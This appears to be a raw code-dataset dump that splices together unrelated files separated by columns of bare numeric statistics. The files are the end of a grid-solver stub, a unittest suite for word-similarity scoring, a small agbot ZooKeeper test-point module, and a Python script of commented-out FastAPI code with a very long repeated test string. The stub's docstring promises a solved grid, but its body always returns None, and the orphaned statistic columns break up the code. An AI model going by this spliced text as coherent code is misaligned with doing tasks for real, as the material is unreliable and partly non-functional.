        (list(list(int))): the solved grid, or None when no solution exists.
    """
    return None
| 37.634146
| 208
| 0.701879
| 475
| 3,086
| 4.526316
| 0.176842
| 0.097209
| 0.051163
| 0.032558
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0.727442
| 0
| 0.001691
| 0.233312
| 3,086
| 81
| 209
| 38.098765
| 0.907016
| 0.83895
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
c2b512ebc117b7128d2c7a8aee76c5e95a25fa8b
| 3,350
|
py
|
Python
|
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
tests/test_word_similarity.py
|
lucasns97/word_ps
|
a048e2ca573f8cda2dc5466f6daf7fbb46b69e64
|
[
"MIT"
] | null | null | null |
# Word PS: Test Word Similarity
#
# Author: Lucas Nunes Sequeira <lucasnseq@gmail.com>
# URL: <https://github.com/lucasns97/word_ps>
# For license information, see LICENSE
from unittest import TestCase
from word_ps.word_similarity import weighted_similarity, ngrams_weighted_similarity
class TestWordSimilarity(TestCase):
    """Unit tests for the word_ps similarity scoring functions.

    Each scorer is exercised with every combination of split method
    ('split' / 'tokenize'), bidirectional flag and argument order, for
    three representative cases: partial overlap (score in the open
    interval (0, 1)), identical strings (score == 1.0), and an empty
    string (score == 0).
    """

    def setUp(self):
        """No fixtures are needed for these tests."""
        pass

    def _check_all_variants(self, func, trg, hyp, check, *extra):
        """Run *func* on (trg, hyp) and (hyp, trg) for every split method
        and bidirectional combination, applying *check* to each score.

        *extra* is forwarded verbatim after the split method (e.g. the
        n-gram size for ngrams_weighted_similarity).
        """
        for split_method in ('split', 'tokenize'):
            for bidirectional in (True, False):
                for a, b in ((trg, hyp), (hyp, trg)):
                    check(func(a, b, bidirectional, split_method, *extra))

    def test_weighted_similarity(self):
        """Tests the weighted_similarity method."""
        # Partial overlap -> score strictly between 0 and 1.
        # (assertTrue / assertEqual replace the original
        # `assertEqual(<bool expr>, True)`, which hid the score on failure.)
        self._check_all_variants(
            weighted_similarity, "Batata frita quente", "Batata frita",
            lambda score: self.assertTrue(0.0 < score < 1.0))
        # Identical strings -> score is exactly 1.0.
        self._check_all_variants(
            weighted_similarity, "Batata frita", "Batata frita",
            lambda score: self.assertEqual(score, 1.0))
        # Empty string against a non-empty one -> score is 0.
        self._check_all_variants(
            weighted_similarity, "", "Batata frita",
            lambda score: self.assertEqual(score, 0))

    def test_ngrams_weighted_similarity(self):
        """Tests the ngrams_weighted_similarity method (n-gram size 3)."""
        # Partial overlap -> score strictly between 0 and 1.
        self._check_all_variants(
            ngrams_weighted_similarity, "Batata quente", "Batata frita",
            lambda score: self.assertTrue(0.0 < score < 1.0), 3)
        # Identical strings -> score is exactly 1.0.
        self._check_all_variants(
            ngrams_weighted_similarity, "Batata frita", "Batata frita",
            lambda score: self.assertEqual(score, 1.0), 3)
        # Empty string against a non-empty one -> score is 0.
        self._check_all_variants(
            ngrams_weighted_similarity, "", "Batata frita",
            lambda score: self.assertEqual(score, 0), 3)
| 38.505747
| 92
| 0.597313
| 356
| 3,350
| 5.488764
| 0.148876
| 0.165814
| 0.14739
| 0.085977
| 0.811668
| 0.811668
| 0.77175
| 0.77175
| 0.769703
| 0.767144
| 0
| 0.012017
| 0.304478
| 3,350
| 87
| 93
| 38.505747
| 0.826609
| 0.08597
| 0
| 0.836364
| 0
| 0
| 0.06783
| 0
| 0
| 0
| 0
| 0
| 0.218182
| 1
| 0.054545
| false
| 0.018182
| 0.036364
| 0
| 0.109091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2f571eb999b1d51c38dcc92450cb20fa5be4eff
| 199
|
py
|
Python
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 2
|
2018-06-23T06:48:46.000Z
|
2018-06-23T10:11:50.000Z
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 5
|
2020-01-03T09:33:02.000Z
|
2021-06-02T00:49:52.000Z
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 1
|
2021-07-07T07:17:27.000Z
|
2021-07-07T07:17:27.000Z
|
from agbot.core.model.context import VerticalContext
from .tp_zk import ZkTestPoint
def run(tp_conf_dict, vertical_context: VerticalContext):
    """Build and return the ZK test point for the given config and context."""
    test_point = ZkTestPoint(tp_conf_dict, vertical_context)
    return test_point
| 28.428571
| 57
| 0.834171
| 27
| 199
| 5.888889
| 0.592593
| 0.075472
| 0.125786
| 0.226415
| 0.314465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105528
| 199
| 6
| 58
| 33.166667
| 0.893258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c2f630b266ac74395e7525c2d1c721a5fafb6a5a
| 32,647
|
py
|
Python
|
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
import os
# from io import BytesIO
# from fastapi import FastAPI
# from starlette.responses import StreamingResponse
from datetime import datetime
# app = FastAPI()
# @app.get("/result")
# async def get_zip() -> StreamingResponse:
# if os.path.exists("C:\\Users\\yinh\\Desktop\\GZHB.zip"):
# output = open("C:\\Users\\yinh\\Desktop\\GZHB.zip", mode="rb")
# # output.seek(0)
# # f = BytesIO()
# # f.write(output)
# headers = {"Content-Disposition": 'attachment; filename="GZHB.zip"'}
# return StreamingResponse(output, headers=headers)
# return None
# if __name__ == "__main__":
# import uvicorn
# uvicorn.run(app, host="127.0.0.1", port=8000)
# from algorithm.List import twoSum
# from algorithm.SingleListNode import test
# from algorithm.string_distinct_max_len import lengthOfLongestSubstring
# print(
# lengthOfLongestSubstring(
# """abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 